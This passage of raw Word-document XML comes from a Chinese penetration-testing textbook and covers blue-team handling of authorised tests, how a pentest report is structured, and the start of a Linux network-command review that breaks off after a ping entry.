        <w:t xml:space="preserve">节中“没有书面授权的渗透测试，无论在技术上如何精妙，本质上都是非法入侵”的论断一脉相承。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队在应对授权渗透测试时的关键动作：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">白名单规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在测试时间窗内，为测试源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">创建临时日志过滤规则，将之标记为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth_pentest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，避免产生大量告警噪音，但仍保留原始日志以支持后期审计。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">监控“越界”行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：配置检测规则，当测试源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围外的目标，或在非时间窗内活动时，立即生成高优先级告警并通过应急联系人确认是否为授权行为。若否，则启动标准事件响应流程。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">测试后审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：测试结束后，安全团队应与渗透测试团队一同复查所有告警与日志，确认所有操作均落在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RoE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">范围内。这是蓝队从红队活动中学习并优化检测规则的机会。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="渗透测试报告从技术事实到业务决策"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试报告：从技术事实到业务决策</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试的价值最终凝结于一份结构清晰、结论可度量的报告。报告是交付物，也是法律文件——若事后组织遭受入侵且攻击路径与报告中指出的漏洞有关，报告将进入法律程序，用于说明组织是否履行了应尽的修复职责。这正是第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节将“报告”定位为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PTES </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最终阶段的原因：攻击者不需要写报告，渗透测试者必须写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一份合格的渗透测试报告应包含以下结构：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">执行摘要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是报告中最先被阅读的部分，面向非技术决策者（CXO、董事会成员、业务负责人）。摘要必须用业务语言而非技术术语，回答三个核心问题：我们的安全态势如何？最重要的风险是什么？下一步应做什么？摘要内容应包括：测试范围、测试周期的概括、发现的严重/高风险数量按等级统计、整体风险评级（如“高/中/低”定性判断，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不编造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">分值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）、关键发现列举、以及战略层级的修复优先级建议。执行摘要的长度通常控制在一至两页。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">技术细节与漏洞发现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这是报告的核心技术部分，面向安全工程师与开发团队。每个发现应包含以下字段：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞标题与编号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（内部跟踪用标识符）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发现日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">发现者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">向量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">风险等级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（高风险/中风险/低风险/信息级）——风险评级采用定性分级，结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向量表征漏洞特征，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">绝不编造具体的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CVSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数值分数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，除非引用官方</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NVD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或镜像官方公告中的已有分数②</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">影响资产</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：受影响的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP、URL、应用组件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞描述与技术原理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：何谓该漏洞、如何产生（回指馆藏已授机理，例如“SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入原理详见《从位到物联》Ch26</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用层及本卷第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章”）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">复现步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：逐步描述攻击者如何触发漏洞，搭配关键请求/响应的摘要（如有必要），但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不输出完整武器化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">③</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">影响说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：该漏洞被利用后可能导致的具体业务后果（数据泄露、权限提升、服务中断）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：具体、可操作、面向开发与运维人员的修复措施（如“在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行代码对用户输入执行参数化查询”）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">风险评级与修复建议矩阵</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将所有发现汇入一个风险-修复优先级矩阵。风险维度采用“严重程度</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> × </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用难度”的定性判断，修复难度采用“工作量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> × </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">业务中断程度”评估。据此排序出短期（1–4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">周）、中期（1–3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">月）、长期（3–6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">月）修复建议。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">不编造精确的修复工时或预算数值，只给出量级估计（如“人天量级”）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">②。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">方法论与工具声明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">简述本次测试采用的流程标准（PTES/OSSTMM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的哪些阶段、使用了何种威胁建模方法）、工具清单（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap、Burp Suite、sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等）、以及未测试的范围与原因（如“因业务窗口期限制，未执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试”）。这一部分既增加报告透明度，也保护测试方在工具产生误报或遗漏时的可解释性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队如何利用渗透测试报告提升安全能力：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">映射</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将报告中确认的漏洞逐一映射到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">战术与技术（详见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节），分析攻击链在各阶段的可见度，据此部署或调整检测规则。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">验证修复有效性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在开发团队完成修复后，蓝队应针对报告中同一漏洞执行随机抽查式复测（可由内部紫队或原渗透团队执行），确保修复未被绕过，且未引入新弱点。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">指标化安全改善</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将报告中高/中风险漏洞的修复率、修复时间（MTTR,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Mean Time to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediate）纳入安全运营度量，持续向上层汇报。这与第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节防御对照框中“将渗透报告的发现转化为可度量的安全基线改善”形成闭环。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="linux网络命令安全语境复习"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux/网络命令安全语境复习</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试的日常操作严重依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令行与网络诊断工具。相关基础原理（协议栈、系统调用、Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语法）已由《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 24–28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（网络卷）及第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 13–18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（系统卷）完整讲授，本节仅做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全语境下的高频用法复习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，不重讲基础原理。这些命令将在本书卷二的侦察阶段与卷三/卷四的利用阶段反复出现，此处为后续章节的实操打下命令行基础。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络连通性诊断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;TARGET_IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，验证三层可达性。在渗透测试中，部分防火墙默认丢弃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">失败不代表主机宕机，应用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描补全探测。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控异常的连续</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量，可能为扫描前奏或隧道外传①。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
